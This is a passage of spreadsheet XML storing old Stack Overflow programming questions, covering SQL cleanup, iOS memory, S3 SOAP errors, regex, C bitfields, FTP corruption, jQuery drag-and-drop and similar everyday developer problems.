&lt;p&gt;If inserting: we're done. Else updating: continue.&lt;/p&gt;
&lt;p&gt;5) It's possible that we no longer associate a category with this item that we did prior to the update. Delete old categories for this itemId.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DELETE FROM MAP WHERE itemId = 2
AND catID &amp;lt;&amp;gt; 2 AND catID &amp;lt;&amp;gt; 3 AND catID &amp;lt;&amp;gt; 5;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;6) If we have disassociated ourselves from a category, it's possible that we left it orphaned. We do not want categories with no items. Therefore, if &lt;code&gt;affected rows &amp;gt; 0&lt;/code&gt;, kill orphaned categories. I haven't found a way to combine these in MySQL, so this is #6 &amp;amp; #7.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT categories.catId
FROM categories
LEFT JOIN map USING (catId)
GROUP BY categories.catId
HAVING COUNT(map.catId) &amp;lt; 1;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;7) Delete IDs found in step 6.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DELETE FROM categories
WHERE catId = 9
  AND catId = 10;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please tell me there's a better way that I'm not seeing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to identify which lines of code participated in a specific execution of a Java program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose that I have a Java program within an IDE (Eclipse in this case).
Suppose now that I execute the program and at some point terminate it or it ends naturally.&lt;/p&gt;
&lt;p&gt;Is there a &lt;strong&gt;convenient&lt;/strong&gt; way to determine which lines executed at least once and which ones did not (e.g., exception handling or conditions that weren't reached?)&lt;/p&gt;
&lt;p&gt;A manual way to collect this information would be to constantly step with the debugging and maintain a set of lines where we have passed at least once. However, is there some tool or profiler that already does that?&lt;/p&gt;
&lt;p&gt;Edit: Just for clarification: I need to be able to access this information programmatically and not necessarily from a JUnit test.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem dealloc'ing memory used by UIImageViews with fairly large image in an UIScrollView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large UIScrollView into which I'm placing 3-4 rather large (320x1500 pixels or so) UIImageView image tiles.  I'm adding these UIImageViews to the scroll view inside of my NIB files.  I have one outlet on my controller, and that is to the UIScrollView.  I'm using a property (nonatomic, retain) for this, and sythesizing it.&lt;/p&gt;
&lt;p&gt;My question is this:  When I observe this in Memory Monitor, I can see that the memory used goes up quite a bit when the view with all these images is loaded (as expected).  But when I leave the view, it and its controller are dealloc'd, but do not seem to give up anywhere near the memory they had taken up.  When I cut one of these views (there are several in my app) down to just 1-3 images that were 320x460 and left everything else the same, it recaptures the memory just fine.&lt;/p&gt;
&lt;p&gt;Is there some issue with using images this large?  Am I doing something wrong in this code (pasted below)?&lt;/p&gt;
&lt;p&gt;This is a snippet from the viewController that is causing problems.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (CGFloat)findHeight 
{
    UIImageView *imageView = nil;
    NSArray *subviews = [self.scrollView subviews];
    CGFloat maxYLoc = 0;
    for (imageView in subviews)
    {
            if ([imageView isKindOfClass:[UIImageView class]])
            {
                    CGRect frame = imageView.frame;
                    if ((frame.origin.y + frame.size.height) &amp;gt; maxYLoc) {
                            maxYLoc  = frame.origin.y;
                            maxYLoc += frame.size.height;
                    }
            }
    }
    return maxYLoc;
}
- (void)viewDidLoad {
    [super viewDidLoad];
    [self.scrollView setContentSize:CGSizeMake(320, [self findHeight])];
    [self.scrollView setCanCancelContentTouches:NO];
    self.scrollView.indicatorStyle = UIScrollViewIndicatorStyleWhite;
    self.scrollView.clipsToBounds = YES;                
    self.scrollView.scrollEnabled = YES;
    self.scrollView.pagingEnabled = NO;
}
- (void)dealloc {
    NSLog(@"DAY Controller Dealloc'd");
    self.scrollView = nil;
    [super dealloc];
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;UPDATE:  I've noticed another weird phenomenon.  If I don't use the scroll on the view, it seems to be hanging on to the memory.  But if I scroll around a bunch and ensure that all of the UIImageViews became visible at one point, it will free up and regain most of the memory it lost.&lt;/p&gt;
&lt;p&gt;UPDATE2: The reason I'm asking this is my app is actually crashing due to low memory.  I wouldn't mind if it were just caching and using up extra memory, but it doesn't seem to ever release it - even in didReceiveMmoryWarning conditions&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a fast language that supports portable continuations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a fast language (ie. a language that can be compiled natively to achieve performance not more than 3 or 4 times slower than C), which supports portable continuations.  By this I mean a continuation that can be serialized on one computer, and deserialized on another.&lt;/p&gt;
&lt;p&gt;I know that SISC can do this (a Scheme implementation in Java), but its slow.  Ditto for Rhino (a Javascript implementation in Java).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need assistance with diagnosing SOAP packet problem with Amazon S3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are building an application which stores data in an S3 bucket.  However, we are having problems with the &lt;strong&gt;PutObject&lt;/strong&gt; method.  Here is the xml packet we are sending out:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&amp;gt;
   &amp;lt;soap:Body&amp;gt;
      &amp;lt;PutObject xmlns="http://doc.s3.amazonaws.com/2006-03-01"&amp;gt;
         &amp;lt;Bucket&amp;gt;lills&amp;lt;/Bucket&amp;gt;
         &amp;lt;Key&amp;gt;lills123&amp;lt;/Key&amp;gt;
         &amp;lt;Metadata&amp;gt;
            &amp;lt;Name&amp;gt;Content-Type&amp;lt;/Name&amp;gt;
            &amp;lt;Value&amp;gt;text/plain&amp;lt;/Value&amp;gt;
         &amp;lt;/Metadata&amp;gt;
         &amp;lt;Metadata&amp;gt;
            &amp;lt;Name&amp;gt;title&amp;lt;/Name&amp;gt;
            &amp;lt;Value&amp;gt;lills&amp;lt;/Value&amp;gt;
         &amp;lt;/Metadata&amp;gt;
         &amp;lt;Data&amp;gt;aGEtaGE=&amp;lt;/Data&amp;gt;
         &amp;lt;ContentLength&amp;gt;5&amp;lt;/ContentLength&amp;gt;
         &amp;lt;AWSAccessKeyId&amp;gt;key&amp;lt;/AWSAccessKeyId&amp;gt;
         &amp;lt;Timestamp&amp;gt;2008-11-12T06:23:17Z&amp;lt;/Timestamp&amp;gt;
         &amp;lt;Signature&amp;gt;signature&amp;lt;/Signature&amp;gt;
      &amp;lt;/PutObject&amp;gt;
   &amp;lt;/soap:Body&amp;gt;
&amp;lt;/soap:Envelope&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this is the response we are getting back from S3:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&amp;gt;
   &amp;lt;soapenv:Body&amp;gt;
      &amp;lt;soapenv:Fault&amp;gt;
         &amp;lt;faultcode&amp;gt;soapenv:Client.badRequest&amp;lt;/faultcode&amp;gt;
         &amp;lt;faultstring&amp;gt;Malformed request&amp;lt;/faultstring&amp;gt;
         &amp;lt;detail/&amp;gt;
      &amp;lt;/soapenv:Fault&amp;gt;
   &amp;lt;/soapenv:Body&amp;gt;
&amp;lt;/soapenv:Envelope&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone tell me what the problem with the SOAP packet is?&lt;/p&gt;
&lt;p&gt;Thanks in advance,
Devan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cannot get regular expression work correctly with multiline</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a quite big XML output from an application. I need to process it with my program and then feed it back to the original program. There are pieces in this XML which needs to be filled out our replaced. The interesting part looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;sys:customtag sys:sid="1" sys:type="Processtart" /&amp;gt;
    &amp;lt;sys:tag&amp;gt;value&amp;lt;/sys:tag&amp;gt;
    here are some other tags
    &amp;lt;sys:tag&amp;gt;value&amp;lt;/sys.tag&amp;gt;
&amp;lt;sys:customtag sys:sid="1" sys:type="Procesend" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the document contains several pieces like this.&lt;/p&gt;
&lt;p&gt;I need to get all XML pieces inside these tags to be able to make modifications on it. I wrote a regular expression to get those pieces but it does not work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlDocument xmlDoc = new XmlDocument();
xmlDoc.Load(@"output.xml");
Regex regExp = new Regex(@"&amp;lt;sys:customtag(.*?)Processtart(.*?)/&amp;gt;(.*?)&amp;lt;sys:customtag (.*?)Procesend(.*?)/&amp;gt;", RegexOptions.Multiline &amp;amp; RegexOptions.IgnorePatternWhitespace &amp;amp; RegexOptions.CultureInvariant);
MatchCollection matches = regExp.Matches(xmlDoc.InnerXml);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I leave the whole stuff in one line and call this regexp without the multiline option, it does find every occurences. By leaving the file as it is and set the multiline option, it does not work. What is the problem, what should I change? Or is there any easier way to get the XML parts between these tags without regexp?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>File System indexing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating an application were I need to scan a directory hive to find a certain file.&lt;/p&gt;
&lt;p&gt;I also want to better understand how indexing works.&lt;/p&gt;
&lt;p&gt;Can anyone point me to any resource preferably in C# that shows how I can create a basic index for file system searching?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between 2 dates in SQLite</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get the difference in days between 2 dates in SQLite? I have already tried something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT Date('now') - DateCreated FROM Payment
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It returns 0 every time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make my image control's imageurl dynamic depending on host?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to convert my web application into a fully dynamic system. One thing I am trying to do is to load a different logo (set in the masterpage template) depending on the host.&lt;/p&gt;
&lt;p&gt;But, even though the code is hit (in page_init), there is no image displayed on any page inheriting the masterpage - no image, no red x's, nothing.&lt;/p&gt;
&lt;p&gt;My code looks like this (from masterpage, the path to the image is correct and pasted from Windows Explorer's property window path):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Protected Sub Page_Init(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Init
    If Request.Url.Host.Contains("localhost") Then
        Image1.ImageUrl = "C:\Users\firstname.lastname\Documents\Visual Studio 2008\WebSites\ecardsystem\images\ECard Platform.jpg."
    End If
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know that I can add the image on the fly using literal controls through codebehind, but this will mean I need to design the html too, by hand, when the design is all done and perfect. Thus this approach will create a bit more work.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatically copying files from a Linux machine to a Windows machine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to automatically copy files from a linux machine to a windows one every day. &lt;/p&gt;
&lt;p&gt;I'm looking for something simple and secure like scp, rsync, sftp. Unfortunately, I'm at a loss of how to set this up on the Windows machine.&lt;/p&gt;
&lt;p&gt;Does anyone know how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is best thing to call your namespace in .Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the past I've always gone and called my namespace for a particular project the same as the project (and principle class) e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace KeepAlive
{
    public partial class KeepAlive : ServiceBase
    {...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then from other projects whenever i've called that class its always been:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;KeepAlive.KeepAlive()...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm now beginning to think that this might not be such a good idea, but I'm sort of stumped what to actually call my namespace. What do other people do? Do you just have one namespace for all your projects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find the Maven installation directory in Eclipse 3.4</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have installed m2eclipse plugin from &lt;a href="http://m2eclipse.codehaus.org/" rel="nofollow"&gt;http://m2eclipse.codehaus.org/&lt;/a&gt;. Now I want to use that as a standalone build tool but I am unable to find the installation directory. Can anyone help me in this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting the current stack trace on Mac OS X</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to work out how to store and then print the current stack in my C++ apps on Mac OS X. The main problem seems to be getting dladdr to return the right symbol when given an address inside the main executable. I suspect that the issue is actually a compile option, but I'm not sure.&lt;/p&gt;
&lt;p&gt;I have tried the backtrace code from Darwin/Leopard but it calls dladdr and has the same issue as my own code calling dladdr.&lt;/p&gt;
&lt;p&gt;Original post:
Currently I'm capturing the stack with this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int BackTrace(Addr *buffer, int max_frames)
{
    void **frame = (void **)__builtin_frame_address(0);
    void **bp = ( void **)(*frame);
    void *ip = frame[1];
    int i;
    for ( i = 0; bp &amp;amp;&amp;amp; ip &amp;amp;&amp;amp; i &amp;lt; max_frames; i++ )
    {
        *(buffer++) = ip;
        ip = bp[1];
        bp = (void**)(bp[0]);
    }
    return i;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which seems to work ok. Then to print the stack I'm looking at using dladdr like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dl_info dli;
if (dladdr(Ip, &amp;amp;dli))
{
    ptrdiff_t       offset;
    int c = 0;
    if (dli.dli_fname &amp;amp;&amp;amp; dli.dli_fbase)
    {
        offset = (ptrdiff_t)Ip - (ptrdiff_t)dli.dli_fbase;
        c = snprintf(buf, buflen, "%s+0x%x", dli.dli_fname, offset );
    }
    if (dli.dli_sname &amp;amp;&amp;amp; dli.dli_saddr)
    {
        offset = (ptrdiff_t)Ip - (ptrdiff_t)dli.dli_saddr;
        c += snprintf(buf+c, buflen-c, "(%s+0x%x)", dli.dli_sname, offset );
    }
    if (c &amp;gt; 0)
        snprintf(buf+c, buflen-c, " [%p]", Ip);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which almost works, some example output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/Users/matthew/Library/Frameworks/Lgi.framework/Versions/A/Lgi+0x2473d(LgiStackTrace+0x5d) [0x102c73d]
/Users/matthew/Code/Lgi/LgiRes/build/Debug/LgiRes.app/Contents/MacOS/LgiRes+0x2a006(tart+0x28e72) [0x2b006]
/Users/matthew/Code/Lgi/LgiRes/build/Debug/LgiRes.app/Contents/MacOS/LgiRes+0x2f438(tart+0x2e2a4) [0x30438]
/Users/matthew/Code/Lgi/LgiRes/build/Debug/LgiRes.app/Contents/MacOS/LgiRes+0x35e9c(tart+0x34d08) [0x36e9c]
/Users/matthew/Code/Lgi/LgiRes/build/Debug/LgiRes.app/Contents/MacOS/LgiRes+0x1296(tart+0x102) [0x2296]
/Users/matthew/Code/Lgi/LgiRes/build/Debug/LgiRes.app/Contents/MacOS/LgiRes+0x11bd(tart+0x29) [0x21bd]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's getting the method name right for the shared object but not for the main app. Those just map to "tart" (or "start" minus the first character).&lt;/p&gt;
&lt;p&gt;Ideally I'd like line numbers as well as the method name at that point. But I'll settle for the correct function/method name for starters. Maybe shoot for line numbers after that, on Linux I hear you have to write your own parser for a private ELF block that has it's own instruction set. Sounds scary.&lt;/p&gt;
&lt;p&gt;Anyway, can anyone sort this code out so it gets the method names right?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Auto Font Size For Text (GD via PHP)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a space of x*y for text to go on $im (GD Image Resource) how can I choose a font size (or write text such that) it does not overflow over that area?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why this union's size is 2 with bitfields?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on turbo C on windows where char takes one byte.Now my problem is with the below union.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;union a
{
 unsigned char c:2;
}b;
void main()
{
printf("%d",sizeof(b));  \\or even sizeof(union a)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;p&gt;This program is printing output as 2 where as union should be taking only 1 byte. Why is it so?
&lt;p&gt;for struct it is fine giving 1 byte but this union is working inappropriately.
&lt;p&gt;&lt;b&gt;And one more &lt;/b&gt;thing how to access these bit fields.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;scanf("%d",&amp;amp;b.c);  //even scanf("%x",b.c);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;p&gt;is not working because we cannot have address for bits.So we have to use another variable like below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int x;
scanf("%d",&amp;amp;x);
b.c=x;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;p&gt;cant we avoid it?? is there any other way???&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apple DMG files over FTP are getting corrupted why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to FTP some apple DMG files, if we do it by hand through Safari or IE it ends up at the destination just fine and uncorrupted. However, if I use a freeware FTP client that we had been using with great success for zip's and exe's or if I use a Powershell script I finished off (adapted from another stackover flow's question's answer) then I lose about a 1/2 Mb on a 10.5 Mb file and the dmg is corrupted. Does anyone have anyclues what could be going wrong? Things I could do to prevent it? So far all I have tried is gzipping the dmg before sending and that accomplished nothing. Again, anything but a dmg gets transmitted just fine.&lt;/p&gt;
&lt;p&gt;FYI I am using binary mode transfers, so that is not it..thx though&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a delegate available for properties in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given the following class: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class TestClass {
  public void SetValue(int value) { Value = value; }
  public int Value { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can do &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TestClass tc = new TestClass();
Action&amp;lt;int&amp;gt; setAction = tc.SetValue;
setAction.Invoke(12);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is all good. Is it possible to do the same thing using the property instead of the method? Preferably with something built in to .net. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the X,Y position of a TWinControl (relative to the screen)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to show a custom hint in a TWinControl but I can't figure out how to get it's position.&lt;/p&gt;
&lt;p&gt;Using position 0,0 shows the hint on the top of my screen (outside the window) so I guess it must be the position of the control on the screen.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've found the TControl Property ClientOrigin which returns what I've expected, is it correct to use ClientOrigin.X and ClientOrigin.Y?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Toolbar and treeview Icons missing when displaying CHM file using HH API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just encountered an interesting problem. I have a CHM file. If I display it using Process.Start it displays correctly.&lt;/p&gt;
&lt;p&gt;If however I launch it using the HH API it displays without any icons in the toolbar and treeview; the main content, including graphics, displays correctly. Here's what it looks like - with a few article titles scribbled out: &lt;img src="http://img527.imageshack.us/img527/3430/problemhelpfilehl2.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;The same file works fine on a colleagues machine with the same setup.&lt;/p&gt;
&lt;p&gt;Any thoughts as to what's going on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if DLL is debug-compiled</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/194616/how-to-tell-if-net-app-was-compiled-in-debug-or-release-mode"&gt;How to tell if .net app was compiled in DEBUG or RELEASE mode?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Simple Question; Is there an easy way to check whether a .NET 1.1 assembly is debug-compiled or not?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery droppables - Change element on drop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a bit new to jQuery and hope somebody can help me out.&lt;/p&gt;
&lt;p&gt;I'm trying to change an element (li) to another element (div) after the (li) has been dropped.&lt;/p&gt;
&lt;p&gt;Sample code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#inputEl&amp;gt;li").draggable({ 
	revert: true, 
	opacity: 0.4,
	helper: "clone"
});
$("#dropEl")
	.droppable({ 
		accept: ".drag",
		hoverClass: "dropElhover",
		drop: function(ev, ui) {
			// change the li element to div here
		}
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is, when i use&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;drop: function(ev, ui) {
     $(ui.draggable).replaceWith("&amp;lt;div&amp;gt;Some content&amp;lt;/div&amp;gt;");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the original draggable elements will be disabled when the function above is triggered.&lt;/p&gt;
&lt;p&gt;I'm using the latest jQuery and jQuery UI stable versions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sliding Notification bar in java (a la Firefox)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to implement a sliding notification bar as the one in Firefox or IE for my java application. But I don't want to reinvent the wheel and I'm sure someone out there has already done it and is willing to share.
Do you know any open-source implementation of this in java/swing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Internet Explorer serves up unknown file type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web server on port 80 and port 81. IE can connect to the server on either port. This worked fine until I installed an application with a file type (.TPJ) that had a MIME type of text/xml on the client PC. At that point IE no longer opened the web site, but offered to download a file &lt;em&gt;serverName.TPJ&lt;/em&gt;. The file contained the correct information from the web site.&lt;/p&gt;
&lt;p&gt;I changed the installer for the application so it didn't register the MIME type. Now IE on the client PC offers to download a file with unknown file type. Note that the application has never been installed on the server PC.&lt;/p&gt;
&lt;p&gt;The problem occurs with IE7. It doesn't occur with Firefox, Safari, or Chrome.&lt;/p&gt;
&lt;p&gt;Does anyone know how to work around this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server and the Guest Account - what is this for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is the guest account in SQL Server (2000, 2005, 2008) supposed to be used? What is it good for? I've tried enabling the account but I still can't get certain users to be able to refresh Excel 2007 PivotTables attached to views which I have given SELECT rights to GUEST.&lt;/p&gt;
&lt;p&gt;What am I missing?   &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can someone explain the Flickr API and how security is established? Why not use AES instead of md5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just trying to understand Flickr's API setup, and how secure it really is.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.flickr.com/services/api/auth.howto.web.html" rel="nofollow"&gt;Flickr API&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Why do a MD5 hash and not something like AES?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ListView Shows Repeated Elements When the Underlying Generic List Does Not Contain Repeated Elements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am binding a generic List to an &amp;lt;asp:ListView /&amp;gt; control to display a tag cloud. The elements in the list are Tag objects, where Tag is basically just something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Tag {
    public string Name { get; set; }
    public int Total { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I create the List&amp;lt;Tag&amp;gt; object and then bind it to a ListView but when the HTML is rendered for the page certain Tag objects are repeated e.g. given the expected tag list of &lt;strong&gt;apple, banana, kiwi, orange, strawberry&lt;/strong&gt; the HTML would actually output something like &lt;strong&gt;&lt;em&gt;apple, banana, apple, apple, strawberry&lt;/em&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I am writing out the contents of my underlying List&amp;lt;Tag&amp;gt; to the Trace.axd and that shows the elements to be in the correct order without duplicates.&lt;/p&gt;
&lt;p&gt;Has anyone ever come across something similar?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Advice about forming Hackers Club</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm thinking of forming a &lt;a href="http://www.catb.org/~esr/jargon/html/H/hacker.html" rel="nofollow"&gt;Hacker&lt;/a&gt;s Club at work.  My idea is that we would meet monthly and at each meeting one member would present an interesting hack he had created.  (The hacks presented wouldn't necessarily have to be software hacks; they could also be the sort of things you read about in &lt;em&gt;MAKE&lt;/em&gt; magazine.) &lt;/p&gt;
&lt;p&gt;There would also be &lt;a href="http://www.catb.org/~esr/jargon/html/A/ANSI-standard-pizza.html" rel="nofollow"&gt;ANSI standard pizza&lt;/a&gt;, veggie pizza, and beer and pop available for socializing afterward.  I'm even thinking of calling the club "&lt;a href="http://www.catb.org/~esr/jargon/html/T/TMRC.html" rel="nofollow"&gt;TMRC&lt;/a&gt;" even though it will have nothing to do with model railroads.&lt;/p&gt;
&lt;p&gt;Has anyone ever tried doing something like this or have any advice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>control lost focus event when using keyboard shortcut</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For both .NET Winforms and Windows Presentation Foundation, if I have a text box that the user has just entered text into, and a button, if the user clicks the button the "LostFocus" event fires before the button click event fires.  However if the user uses a keyboard shortcut for the button (e.g. Button's text is "&amp;amp;Button" or "_Button" and user performs Alt+B), then the "LostFocus" event fires after the button click event, which is less useful.&lt;/p&gt;
&lt;p&gt;Do you know of reasonable workarounds?  We have various things that we want to occur in LostFocus before ButtonClick.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Updating sort keys after delete</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table which has a field &lt;code&gt;sort_id&lt;/code&gt;. In this field there are numbers from 1 to n, that define the order of the data sets.
Now I want to delete some elements and afterwards I want to reorder the table. Therefore I need a query that "finds" the gaps and changes the &lt;code&gt;sort_id&lt;/code&gt; field according to the modifications.&lt;/p&gt;
&lt;p&gt;Sure, I could do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT sort_id FROM table WHERE id = 5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then save the sort_id and afterwards:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DELETE FROM table WHERE id = 5
UPDATE table SET sort_id = sort_id - 1 WHERE sort_id &amp;gt; {id from above}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'd like to do the reordering process in one step.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DB-side encryption via NHibernate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're looking to encrypt a field using DB-side encryption via NHibernate (most examples we've come across are app-side, which is not what we would like). The issue has been raised a couple of times, but no answers yet it seems. &lt;/p&gt;
&lt;p&gt;On SQL Server 2005, for instance, and forgetting key-related issues for now, this means INSERTing EncryptByKey(Key_GUID(MyKey), MyValueToEncrypt) and SELECTing DecryptByKey(MyEncryptedField). The property might be a string, whereas the field has to be a varbinary. &lt;/p&gt;
&lt;p&gt;We've vaguely got somewhere - using upper() and lower() instead of encryption functions - by combining paired properties, one mapped with a custom user type and the other with a formula attribute. &lt;/p&gt;
&lt;p&gt;However if anyone has any ideas on how to do this in a nicer way, we'd be most grateful for a few pointers :o) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you concatenate two huge files with very little spare disk space?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose that you have two huge files (several GB) that you want to concatenate together, but that you have very little spare disk space (let's say a couple hundred MB).  That is, given &lt;code&gt;file1&lt;/code&gt; and &lt;code&gt;file2&lt;/code&gt;, you want to end up with a single file which is the result of concatenating &lt;code&gt;file1&lt;/code&gt; and &lt;code&gt;file2&lt;/code&gt; together byte-for-byte, and delete the original files.&lt;/p&gt;
&lt;p&gt;You can't do the obvious &lt;code&gt;cat file2 &amp;gt;&amp;gt; file1; rm file2&lt;/code&gt;, since in between the two operations, you'd run out of disk space.&lt;/p&gt;
&lt;p&gt;Solutions on any and all platforms with free or non-free tools are welcome; this is a hypothetical problem I thought up while I was downloading a Linux ISO the other day, and the download got interrupted partway through due to a wireless hiccup.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Toolbar moves up when call finishes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While in a call, if the user wants to use my application, and if the call finishes, and the user is still in the application, the toolbar moves up, well all the view moves up, and so the toolbar now has a space in the bottom. Basically the height "Touch to return to call" has. I am using a toolbar and a navigation controller. The navigation controller moves fine, and everything in the view moves accordingly, the only problem is with the toolbar. So the question is, Is there an event, which is called after the call is finished, so I can set the frame again of my toolbar? I tried this delegate with no luck:&lt;/p&gt;
